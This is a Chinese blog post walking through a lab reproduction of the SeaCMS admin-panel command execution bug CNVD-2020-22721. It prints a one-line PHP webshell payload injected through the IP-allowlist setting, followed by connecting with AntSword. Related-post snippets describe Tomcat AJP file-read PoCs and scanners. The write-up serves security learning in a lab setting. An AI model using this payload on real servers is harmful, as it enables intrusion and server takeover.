WEB 漏洞:seacms 远程命令执行(CNVD-2020-22721)

最新推荐文章于 2024-02-21 14:08:38 发布
最新推荐文章于 2024-02-21 14:08:38 发布
阅读量501 收藏 1
点赞数 8
分类专栏: 漏洞复现 WEB 漏洞 文章标签: 安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79118231/article/details/134081000
版权

注:个人笔记,并不全面,仅供参考。

漏洞环境

海洋CMS是视频类的CMS,是远程命令执行漏洞,漏洞编号为: CNVD-2020-22721

漏洞描述

海洋CMS是一款基于PHP+MYSQL架构的,可跨平台运行的网站内容管理系统。

seacms后台存在命令执行漏洞。攻击者可利用该漏洞获取网站服务器控制权。

开始复现

本次复现是在 VULFOCUS 上进行复现

  1. 访问镜像地址的80映射端口
    在这里插入图片描述

  2. 进入后台登录后台

    后台路径:/manager
    后台账密:admin:admin
    在这里插入图片描述

在这里插入图片描述

  1. 找到后台IP管理设置

在这里插入图片描述

  1. 在允许IP中输入本地回环地址 127.0.0.1,然后进行抓包

在这里插入图片描述

  1. 结尾添加webshell,一句话木马
";eval($_REQUEST[777]);//

在这里插入图片描述

  1. 放包后使用蚁剑进行连接。访问其路径测试链接,然后进行添加

在这里插入图片描述

  1. 打开文件管理,进入 /tmp目录下成功获得flag

在这里插入图片描述

ZS_zsx
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现】海洋CMS6.28远程代码执行
weixin_47443077的博客
05-17 2288
漏洞复现】海洋CMS6.28远程代码执行 文章目录【漏洞复现】海洋CMS6.28远程代码执行一、漏洞背景二、漏洞原理三、漏洞复现 一、漏洞背景 海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 该CMS6.28版本存在命令执行漏洞,攻击者可以通过远程命令执行入侵被攻击者主机。 二、漏洞原理 area参数处理过的地方经过字符是否非法判断之后,调用ech
CNVD-2020-10487-Tomcat-ajp-POC:CNVD-2020-10487(CVE-2020-1938),tomcat ajp文件读取长度poc
03-08
CNVD-2020-10487-Tomcat-Ajp-lfi-POC CNVD-2020-10487(CVE-2020-1938),tomcat ajp lfi poc注意:poc.py仅在python2.7上运行,不支持python 3+ 用法:pip install -r requirements.txt python poc.py -p 8009 -f“ /WEB-INF/web.xml” 127.0.0.1
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 127.0.0.1 www.baidu.com www.google.com 2,python threading-find-port-8009.py 将会生成8009.txt,作用为扫描ip.txt中域名/ ip查找开放8009端口 3,python线程-CNVD-2020-10487-Tomcat-Ajp-lfi.py 从8009.txt中筛选出符合裂缝的网址,放置于vul.txt中最后vul.txt中存在的域名即为含有漏洞的域名亲测补天公益src有上百站点,教育src大概三百站点包含此突破 4,测试 拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
""" 声明: 本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS < 6.0.48 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多介绍请访问笔者博客:0xtlu.github.io """
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
seacms海洋cms漏洞
YouthBelief的博客
10-29 5384
seacms海洋cms漏洞前言一、seacms 远程命令执行CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1584
seaCms-命令执行】后门代码写入可解析文件中
seacms 远程命令执行CNVD-2020-22721
小小猪的博客
12-30 2175
seacms 远程命令执行CNVD-2020-22721漏洞简介: 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 环境搭建: 登录后台,账号admin,密码admin 访问后台IP安全设置网页 burp进行抓包,后面拼接一句话命名 POST /manager/ad..
漏洞复现】五、seacms 远程命令执行CNVD-2020-22721
weixin_52351575的博客
09-21 450
在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
SeaCMS远程命令执行(CNVD-2020-22721)
最新发布
m0_65150886的博客
02-21 319
SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,可以直接写入文件。后台路径:/manager 后台密码:admin:admin。2.访问http://ip:port/manager ,进入后台登录页面。海洋CMS是一个自适应电脑、手机、平板、APP多个终端入口的程序。1.访问http://ip:port,出现如下页面,开始实验。5.点击确认,并通过burp进行抓包,修改post请求。3.输入账号密码,进行登录。
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
seacms_CNVD-2020-22721_v10.1漏洞分析与复现
一个努力学习网安的小牛马
10-27 855
seacms漏洞复现详情
漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)
qq_58683895的博客
10-27 611
复现SeaCMS文件执行漏洞,有效版本v10.1(CNVD-2020-22721)
scacms_v10.1_RCE_cnvd-2020-22721漏洞复现
weixin_51559599的博客
10-27 74
vulfocus 平台后台登陆页面/manager账密漏洞位置必须一次成功,否则重启环境。
CNVD-2020-22721seaCms命令执行漏洞
qq_46487664的博客
07-27 136
SeaCMS v12.9存在命令执行漏洞,在manager/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。
WEB漏洞之:海洋CMS代码执行CNVD-2020-22721
一位热爱网安的年轻人的博客
11-18 1490
web安全漏洞复现之:海洋cms远程代码执行
seacms 远程命令执行CNVD-2020-22721漏洞复现
weixin_42675091的博客
09-06 1083
seacms 远程命令执行CNVD-2020-22721漏洞复现
cnvd-2020-10487-tomcat-ajp-lfi
10-21
cnvd-2020-10487-tomcat-ajp-lfi是一种利用Tomcat中Apache JServ协议(AJP)的本地文件包含(LFI)漏洞。该漏洞允许攻击者在服务器上执行任意的文件读取和执行操作,从而可能导致敏感信息泄露、甚至服务器完全受控。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值